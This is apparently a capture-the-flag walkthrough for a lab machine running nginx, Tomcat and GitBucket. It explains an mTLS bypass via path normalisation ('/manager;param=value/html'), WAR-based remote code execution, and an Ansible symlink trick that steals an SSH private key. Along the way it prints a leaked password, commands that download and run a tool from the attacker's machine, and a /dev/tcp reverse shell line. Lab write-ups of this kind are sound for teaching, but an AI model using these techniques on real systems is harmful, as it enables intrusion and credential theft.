There is a Nginx running on the remote machine, perhaps as a reverse proxy, and then, it should be an Upstream Web Server such as Apache or Tomcat
If it is the case, we should be aware that the way the two web servers interpret the routes may be diffferent and the normalisation they do of the routes
If we take a look at the website from the browser, we see that it is running GitBucket as the Web Application
There is a login form and we can do nothing until we log into the application
Since we do not have a valid account, we will create a new one with the following data
Once logged in, we can browse the repositories section. And we have the following →
Two repositories and several activity related to both repositories and certain users → Luis and Alex
Inspecting both repositories, the so-called Infra does not have much
However, there are bunch of interesting things in the commits section of the seal_market repository
If we browse the repository files corresponding to the commit made by Luis, whose comment is Updating tomcat configuration, we can see the content of the tomcat-users.xml file inside the tomcat directory
Note that this file usually contains some type of credentials related to the /manager/html panel or something similar
In this case we have the credentials of the user tomcat who has manager-gui and admin-gui roles
User → TomcatPassword → 42MrHBf*z8{Z%
Although, remember that we cannot access to the /manager/html due to the 403 Forbidden Error to check the above credentials
If we keep inspecting the commits section and the corresponding files on those timelines, we come across with the nginx’s default configuration file in the Updating nginx configuration commit
server { ... root /var/www/html; ssl_protocols TLSv1.1 TLSv1.2;ssl_verify_client optional; ...}
We see the ssl_verify_client directive, which enables the mTLS (Mutual TLS)
Notice that, in a TLS Connection, the server presents to the client its TLS Certificate and the client validates it by checking that everything is correct
But, in the mTLS, both parties validate their certificates. Therefore, the client must present its TLS Certificate to the server
The certificate presented by the client must be issued by the same CA that issued the Server Certificate
In this case, the value of this directive is optional instead of on. This allows to handle validation in other configuration blocks such as the location blocks
If the value of the directive were on, any client presenting an invalid certificate would be rejected by Nginx with a 400 Bad Request
Since the ssl_verify_client parameter’s value is optional, if verification of the client’s certificate fails, the Web Server will not respond directly with a 400 Bad Request but will handle the validation in the corresponding location block, depending on the path of the requested resource
Then, if the verification fails, nginx will respond with a 403 Forbidden
That’s why we get 403 Forbidden when trying to access resources such as /html/manager or /admin/dashboard, because we enter the corresponding location block
Any requested resource, whose URI does not match the three location blocks above, will be dropped to the location / block and passed directly to the backend web server, in this case Tomcat, via the proxy_pass directive
This is where the concept set out above comes into play
We said that, in a web server structure, where there is an nginx running as a reverse proxy, receiving all requests, and a backend web server, such as Apache or Tomcat, handling the requested dynamic content, the way they handle and normalise the urls may differ between them
Applied to /manager/html, we know that if we request this resource, that request will fall in the location /manager/html block and we will receive a 403 Forbidden as the mTLS validation will also fail
We can address this situation in two ways →
Assuming that the CA that issued the server certificate is installed on the same machine (Bad Practice!! 😅), if an LFI vulnerabilty is disclosed in any Web Server Application, an attacker could try to point to the path of the CA’s private key, extract its content and create, from its side, a valid certificate for the client that will be presented to the Web Server to pass mTLS validation
Or, in this case, we could investigate whether nginx and tomcat differ in URL normalisation. So, we could request a resource that contains /html/manager but does not match the path specified in the location /html/manager block, so this request will fall in the location / and be passed to Tomcat, which may interpret the requested URL correctly (as /html/manager)
Nginx mTLS Bypass (Path Normalization) leads to RCE in Tomcat’s Manager via .WAR file deployment
So, according to the above resources and the following image →
Since the way nginx and tomcat parse the URL is different, we could do a little manipulation by adding characters such as ..; or an URL parameter /;name=orange/ within the requested path in order not to match with the /manager/html location block
https://domain.tld/manager;param=value/html
As mentioned, the /manager;param=value/html path will not match the /manager/html location block defined in nginx, so this request will fall into the / location block, passing it to tomcat
Tomcat will then parse the requested path as /manager/html, bypassing the mTLS validation by avoiding entering the location blocks containing the validation
Therefore, we request the following url →
https://10.129.95.190/manager;param=value/html
And we are asked for credentials to access the tomcat manager interface
Once we’re in, we have several ways to get Remote Code Execution to access the remote machine by stablishing a reverse connection
We can upload a WAR file containing a .JSP file which makes a reverse connection to the specified socket (IP Address:Port) inside it once the WAR file is deployed
401603 4 -rw-r--r-- 1 luis luis 220 May 5 2021 /home/luis/.bash_logout401604 4 -rw-r--r-- 1 luis luis 3797 May 5 2021 /home/luis/.bashrc539053 4 -rw-rw-r-- 1 luis luis 118 May 5 2021 /home/luis/.config/jgit/config 401605 4 -rw-r--r-- 1 luis luis 807 May 5 2021 /home/luis/.profile401811 51268 -rw-r--r-- 1 luis luis 52497951 Jan 14 2021 /home/luis/gitbucket.war
We could search for some juicy information within the .bashrc file, such as aliases or check for leaked credentials in the config file inside the jgit directory
But there is nothing interesting in these files
Looking for any software installed on the remote machine located in the /opt directory, we found the following content
find /opt -readable 2> /dev/null
Command Output
64913 4 drwxr-xr-x 3 root root 4096 May 7 2021 /opt 85231 4 drwxr-xr-x 4 luis luis 4096 Apr 10 14:27 /opt/backups 85233 4 drwxrwxr-x 2 luis luis 4096 Apr 10 14:27 /opt/backups/archives 627 592 -rw-rw-r-- 1 luis luis 606047 Apr 10 14:25 /opt/backups/archives/backup-2025-04-10-14:25:33.gz 1731 592 -rw-rw-r-- 1 luis luis 606047 Apr 10 14:27 /opt/backups/archives/backup-2025-04-10-14:27:32.gz 1371 592 -rw-rw-r-- 1 luis luis 606047 Apr 10 14:26 /opt/backups/archives/backup-2025-04-10-14:26:32.gz 85232 4 drwxrwxr-x 2 luis luis 4096 May 7 2021 /opt/backups/playbook 64967 4 -rw-rw-r-- 1 luis luis 403 May 7 2021 /opt/backups/playbook/run.yml
The /opt/backups/playbook directory seems interesting
It contains an ansible playbook with the following content →
This ansible playbook has three different defined tasks
Copy Files → Uses the Synchronize module to copy the content from a certain system location to another
Server Backups → Compresses the specified directory or archive by leveraging of the Archive module
Clean → Remove an specific directory using the absent state of the File module
However, there is one thing about the Copy Files task that strikes me, it uses the ansible synchronize module to perform the copy operation
But, the copy_links option is set to yes, which means that it copies the actual file that the symlink points to instead of copying the symlink itself
This makes it vulnerable to a local privesc if there was a cron job being run by another user running the ansible-playbook binary with this playbook passed as an argument or if the current user had a sudoers privilege assigned that makes him capable of running the same as another user
The source of the sync task is /var/lib/tomcat9/webapps/ROOT/admin/dashboard
If we had write permissions on this directory, we could create a symbolic link pointing to a sensitive file
If another user runs this ansible playbook, we might be able to read arbitrary files from that user
Since the copy_links parameter is enabled, we create a symlink inside the writable folder pointing to a sensitive file owned by the effective user and the sync task will copy the actual file pointed to by the symlink instead of the symlink itself, as explained above
ls -l /var/lib/tomcat9/webapps/ROOT/admin/dashboard | grep -i -- uploads
Command Output
“bash
drwxrwxrwx 2 root root 4096 May 7 2021 uploads
And the uploads directory is world-writable, so we can create any file within it
We have already checked that the current user does not have any sudoers privilege
We can now list the processes that run at regular time intervals to check if a certain user, such as luis, runs this ansible-playbook
To achieve this task, just transfer a pspy binary to the remote machine
From the Attacker
Download the pspy binary
curl --silent --location --request GET 'https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64' --output pspy64
Build a Simple HTTP Server
python3 -m http.server 80
From the Target
Transfer the pspy binary and execute it
wget 'http://10.10.16.37/pspy64' -O /dev/shm/pspy
chmod 777 !$!$
And if we wait a little bit, we get the following results →
sudo -u luis /usr/bin/ansible-playbook /opt/backups/playbook/run.yml
And we see that root is executing the above commands as user luis
That command runs the analyzed ansible playbook
Therefore, since we have write permissions on the uploads directory, as mentioned, we could create a symlink pointing to a sensitive file owned by luis
This file could be, if exists, the /home/luis/.ssh/id_rsa
Thus, we could connect to the remote machine via SSH as luis
Note that the destination path of the sync task is /opt/backups/files
if we list the content of the /opt/backup directory, there is no files directory
Remember that all tasks defined in the ansible playbook are executed simultaneously
So, after the sync task is executed, the archive task compresses the content of the /opt/backup/files directory and stores the generated compressed file in the /opt/backup/archives directory
Subsequently, the clean task deletes the /opt/backup/files directory, which means that we have to extract the compressed file from the /opt/backup/files directory
Therefore, proceed as follows →
From the Target
Create a symlink in /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads pointing to /home/luis/.ssh/id_rsa
And we are in as luis! Grab the user.txt flag and continue 😊
cat ~/user.txt
Privesc #2 (If exists)
Non-Privileged User → Luis
Sudo Privileges (Ansible-Playbook)
As we did before, first check to which groups the current user belongs to
id
Command Output
uid=1000(luis) gid=1000(luis) groups=1000(luis)
But the user does not belong to any interesting group
Next, we check the sudoers privileges assigned to luis
sudo -l
Command Output
Matching Defaults entries for luis on seal: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser luis may run the following commands on seal: (ALL) NOPASSWD: /usr/bin/ansible-playbook *
And we have that the user luis can run the binary /usr/bin/ansible-playbook as any user of the system without providing a password and passing it as argument any playbook
From the Attacker
So, we could create an ansible playbook containing a task which runs a system command like bash -c 'bash -i &> /dev/tcp/<IP_ADDRESS>/<PORT> 0&1'